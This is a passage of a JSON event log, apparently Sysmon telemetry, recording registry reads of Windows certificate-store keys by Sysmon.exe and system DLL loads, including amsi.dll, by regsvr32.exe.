"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "amsi.dll", - "image_path": "C:\\Windows\\System32\\amsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", - "registry_value": "SyncRootManager", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.StateRepositoryPS.dll", - "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "MpOAV.dll", - "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cldapi.dll", - "image_path": "C:\\Windows\\System32\\cldapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - 